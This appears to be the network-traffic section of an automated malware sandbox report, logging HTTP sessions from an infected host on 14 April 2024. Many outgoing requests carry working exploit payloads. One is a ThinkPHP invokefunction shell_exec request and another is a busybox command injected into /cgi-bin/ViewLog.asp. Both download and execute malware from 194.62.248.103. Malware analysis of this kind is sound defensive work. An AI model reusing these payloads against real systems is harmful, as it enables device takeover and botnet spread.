                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1012192.168.2.2355292156.241.95.7323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:29.155308008 CEST179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 34 2d 31 34 20 32 32 3a 33 37 3a 32 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.54.60MAC Address: Server Time: 2024-04-14 22:37:27Auth Result: .


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1013192.168.2.2355304156.241.95.7323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:29.780009985 CEST179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 34 2d 31 34 20 32 32 3a 33 37 3a 32 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.54.60MAC Address: Server Time: 2024-04-14 22:37:28Auth Result: .


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1014192.168.2.2350456112.192.16.13580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:29.804647923 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1015192.168.2.234435431.136.34.158080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.199532032 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:31.184600115 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:33.104346991 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:36.943967104 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:44.622759104 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:59.980619907 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1016192.168.2.234128694.121.197.2278080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.222654104 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1017192.168.2.233837694.122.193.2218080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.226161957 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1018192.168.2.233931894.122.58.1398080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.226561069 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1019192.168.2.234449294.65.249.1308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.262021065 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1020192.168.2.2355308156.241.95.7323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.450999975 CEST179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 34 2d 31 34 20 32 32 3a 33 37 3a 32 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.54.60MAC Address: Server Time: 2024-04-14 22:37:28Auth Result: .


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1021192.168.2.234108888.214.196.23280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.507113934 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:30.733203888 CEST323INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1022192.168.2.233578262.162.152.768080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.561896086 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1023192.168.2.233770631.200.110.2198080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.565973997 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1024192.168.2.234153494.121.181.698080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.566890955 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1025192.168.2.233727694.123.125.558080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.570142984 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1026192.168.2.235819488.93.161.14380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:30.635955095 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:31.160060883 CEST221INData Raw: 53 65 72 76 65 72 3a 20 61 6c 70 68 61 70 64 2f 32 2e 31 2e 38 0d 0a 44 61 74 65 3a 20 46 72 69 20 4a 61 6e 20 31 32 20 30 36 3a 31 36 3a 31 31 20 32 30 31 38 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e
                                                        Data Ascii: Server: alphapd/2.1.8Date: Fri Jan 12 06:16:11 2018Pragma: no-cacheCache-Control: no-cacheContent-type: text/htmlContent-length: 62<html><body><h1>The request is forbidden.</h1></body></html>
                                                        Apr 14, 2024 16:37:31.160073996 CEST36INHTTP/1.1 403 Forbidden


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1027192.168.2.2355350156.241.95.7323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:31.092547894 CEST179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 34 2d 31 34 20 32 32 3a 33 37 3a 32 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.54.60MAC Address: Server Time: 2024-04-14 22:37:29Auth Result: .


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1028192.168.2.235102095.141.116.2780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:31.432379961 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:32.976497889 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:34.800071955 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:38.479568958 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:45.902715921 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:38:00.492759943 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1029192.168.2.233956295.85.19.10280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:31.442994118 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:31.753865957 CEST353INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.4.6 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:26:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 181
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 36 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.4.6 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1030192.168.2.235952695.142.161.10980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:31.450189114 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:31.767942905 CEST507INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:31 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 313
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
